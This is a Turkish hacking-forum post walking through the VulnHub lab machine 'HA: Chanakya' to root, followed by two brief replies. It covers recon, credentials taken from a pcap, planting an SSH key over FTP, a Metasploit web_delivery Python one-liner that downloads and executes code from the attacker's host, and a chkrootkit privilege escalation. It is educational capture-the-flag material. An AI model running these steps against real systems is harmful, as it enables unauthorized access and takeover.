THT DUYURU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

HA: Chanakya (Boot2Root) Zafiyetli Makine Çözümü //Siber Güvenlik Kulübü

PigGunner - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
07/2013
Nereden:
Turk
Mesajlar:
2.312
Konular:
98
Teşekkür (Etti):
201
Teşekkür (Aldı):
399
Ticaret:
(0) %
21-01-2020 08:41
#1
HA: Chanakya (Boot2Root) Zafiyetli Makine Çözümü //Siber Güvenlik Kulübü
HA: Chanakya Zafiyetli Makine Çözümü



Seviye: Orta Seviye


Görev: Hedef Makineyi Numaralandırmak ve Kök Erişimini Almak.




Makine 9 Kasım 2019’da Hacking Articles tarafından yayınlanmıştır.



Kurulum


Yüklemek için siteyi ziyaret edebilirsiniz.

Bağlantı: https://www.vulnhub.com/entry/ha-chanakya,395/

OVA şeklinde hazır olarak kurabilirsiniz.

Örn: Virtual Machine --> File --> Open --> chanakya

Başlayalım.



Çözüm


Öncelikle ‘netdiscover’ yazarak ağdaki IP’leri listeliyoruz.

Kod:
netdiscover
Daha sonra nmap(network mapping)(ağ haritalandırma) aracı yardımıyla çözeceğimiz makinenin IP’sindeki açık portları listeliyoruz.

Buradaki –p- parametresi aracın bütün portları (65535) taramasını sağlar.

Buradaki –A parametresi ise taramada sürüm, işletim sistemi (OS) tespiti, script taraması ve traceroute belirlenmesini sağlar.

İşletim Sistemi (Operating System (OS))

Script Nedir? (Herhangi bir programlama dilinde yazılmış, uygulama bölümlerinin tüm kodlarını içinde bulunduran hazır kod bloklarına script adı verilir.)

TraceRoute Nedir? (Network TCP/IP içerisinde kullaılan bir sorgulama komutudur. Bu sorgulama komutu ile gönderilen üç paketin hangi ağ geçitlerinden geçtiği takip edilir ve bir paketin uç noktaya hangi yolları izleyerek gittiği görülür.)

Kod:
nmap –p- -A IP_ADRESI
Kod:
nmap –p- -A 192.168.1.44


Burada nmap 3 tane port buldu. 21(FTP) 22(SSH) 80(HTTP)

Öncelikle HTTP portundan başlayarak siteyi birazcık inceliyoruz. Ancak site üzerinde ne kaynak kodlarında, ne yazılarda ne de resimlerde herhangi bir ipucu bulamadık.

Daha sonra sitelerdeki dizinleri kontrol etmeye karar verdik. Bunu dirb(Web içerik tarayıcısı) isimli araç ile kaba kuvvet saldırısı yaparak sağlayacağız. Dirb, bizim ona vereceğiniz link sözlük bazlı olarak tarayarak bütün içerikleri, linkleri vb. çıkarıp bize listeleyen bir araçtır.

Burada –X parametresi belirlenen uzantılara her türlü kelimenin eklenmesini sağlar.

Kod:
dirb http://192.168.1.44/ -X .txt
Daha sonra abuse.txt isimli bir dosya buluyor.

(wget internetten komut satırı ile dosya indirmeyi sağlana indirme yöneticisidir.)

Yukarıdaki komut ile dosyayı indiriyoruz.

cat komutu ile de okuyoruz.

Kod:
cat abuse.txt
Çıktı: nfubxn.cpncat

Anlamlı bir ifade bulamadık. Bu yüzden bunun bir şifre olduğunu düşünüyoruz ve decode etmeyi deniyoruz.



İnternette birazcık “nfubxn.cpncatcryptography” olarak aradıktan sonra şifrelemenin ROT13 türünde olduğunu gördük ve decode ettik.




Çıktı: ashoka.pcapng

Daha sonra bunun bir WireShark dosyası olduğunu anladık. Wget ile dosyayı indirdik ve wireshark ile dosyayı açtık.

Kod:
wireshark ashoka.pcapng


Tcp akışını aşağıdaki kod ile filtrelediğimizde kullanıcı adı ve şifreyi elde ediyoruz.

Tcp.stream

User: ashoka

Pass: kautilya

Daha sonra ftp sunucusuna giriş yapıyoruz.

Kod:
ftp 192.168.1.44
Elde ettiğimiz kullanıcı adı ve şifreyi giriyoruz.

Kod:
ashoka
Kod:
kautilya
Daha sonra sunucu da ki dosyaları detaylı şekilde listeliyoruz.

‘.ssh’ dosyasının olmadığını görüyoruz ve ‘.ssh’ dosyasını biz oluşturuyoruz.



Daha sonra ssh-keygen diyerek key’imizi oluşturuyoruz.

Kod:
ssh-keygen
Koyacağınız parola herhangi bir şey olabilir. Ör.: ‘tht’ koyalım.

Kod:
cd .ssh
Kod:
ls
Daha sonra .ssh dizinini listeliyoruz ve id_rsa.pub’ı görüyoruz. Oluşturduğumuz anahtarları authorized_keys’e aktarıyoruz.

Kod:
cat id_rsa.pub > authorized_keys
Kod:
ls


Daha sonra tekrar ftp sunucusuna bağlanıp, oluşturduğumuz anahtarları yüklüyoruz.

Kod:
ftp 192.168.1.44
Kod:
ashoka
Kod:
kautilya
Kod:
put authorized_keys
Kod:
ls



Not: Resimde kök dizine yüklemişiz. Normalde ‘.ssh’ dizinine yüklememiz gerekir aksi halde çalışmayacaktır. Ayrıca ‘.ssh’ dizinine kolayca yüklemek için ‘authorized_keys’i /root/ dizinine taşıyabilirsiniz. Sonra ftp sunucusunda ‘.ssh’ dizinine gelip ‘put authorized_keys’ diyerek yükleme işlemini gerçekleştirebilirsiniz.

Şimdi makineye yüklediğimiz ssh’ları kullanarak ashoka olarak giriş yapabileceğiz.

Kod:
ssh ashoka@192.168.1.46
Sahip olduğumuz kabuk ile makinanın içerisinde biraz dolaşıyoruz ve ‘tmp’ dizininde log dosyası olduğunu fark ediyoruz.

Kod:
ls /tmp
Kod:
cat /tmp/logs


Loglarıinecelediğimizde bunun bir Chkrootkit Test çıktısı olduğunu anlıyoruz.

Rootkit Nedir? (Rootkit yazılımları, saldırganların ele geçirdikleri sisteme daha sonra erişim sağlayabilmelerine imkân sunan zararlı yazılımlardır.)

Chkrootkit nedir? (Bu tür rootkit yazılımlarının sistemdeki varlığını kontrol eden rootkit tespit yazılımları bulunmaktadır. Bunlardan bir tanesi de Chkrootkit’dir.)

Artık yetki edinmemiz gerekiyor ve bunu métasploit de web_delivery modülünü kullanarak yapacağız.

web_delivery nedir? (MSF web_delivery istismar modülü, web sunucusu (Kali) üzerinden kurban sistemlere payload göndermek için kullanılır. Bu modül, kurban sistemlerde çalıştırılan bir komut ile web suncusunda kayıtlı olan zararlı yazılım çağırılarak çalıştırılması için kullanılır. Kurban işletim sisteminde kurumlarda ve son kullanıcı bilgisayarlarında en çok kullanılan anti-virüslerden biri yüklü olmasına rağmen Meterpreter bağlantısının elde edilebildiği görülecektir.)

Métasploit’i açıyoruz.

Kod:
msfconsole
Kullacanağımızexploiti ve modülü seçiyoruz.

Kod:
use exploit/multi/script/web_delivery
Kendi makinemizin IP adresini düzenliyoruz.

Kod:
set lhost 192.168.1.47
Ve çalıştırıyoruz.

Kod:
exploit
Burada bizlere yukarıda da açıkladığımız gibi çalıştırmamız gereken komutu da veriyor.

Örn:
Kod:
python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.1.47:8080/bFQwW5lqU95K98j', context=ssl._create_unverified_context());exec(r.read());"


Komutu çalıştırıyoruz.



Oturumumuz da geldi.



Oturumumuzu aldıktan sonra makinede root kabuğunu almak için farklı bir exploit kullanıyoruz.

Kod:
use exploit/unix/local/chkrootkit
Aşağıdaki gibi düzenliyoruz.

Kod:
set session 1
Kod:
set lport 8888
Çalıştırıyoruz.

Kod:
exploit


Daha sonra ls diyerek listeliyoruz ve final.txt’yi görüyoruz. Final.txt’yi okuyarak makine çözümünü sonlandırıyoruz.

Kod:
ls
Kod:
cat final.txt




Umarım beğenmişsinizdir. Bence güzel bir zafiyetli makineydi. Teşekkürler.
---------------------
Copyright by PigGunner.

Konu PigGunner tarafından (21-01-2020 08:46 Saat 08:46 ) değiştirilmiştir.
"P4RS Teşekkür etti.
"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.559
Konular:
481
Teşekkür (Etti):
1121
Teşekkür (Aldı):
2268
Ticaret:
(0) %
21-01-2020 08:48
#2
Cevap: HA: Chanakya (Boot2Root) Zafiyetli Makine Çözümü //Siber Güvenlik Kulübü
Buyuk badirelerden sonra basarmis olman super
PigGunner - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
07/2013
Nereden:
Turk
Mesajlar:
2.312
Konular:
98
Teşekkür (Etti):
201
Teşekkür (Aldı):
399
Ticaret:
(0) %
21-01-2020 15:47
#3
Cevap: HA: Chanakya (Boot2Root) Zafiyetli Makine Çözümü //Siber Güvenlik Kulübü
Alıntı:
"P4RS´isimli üyeden Alıntı Mesajı göster
Buyuk badirelerden sonra basarmis olman super

Hocam sağ olun, destekleriniz sayesinde.
---------------------
Copyright by PigGunner.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler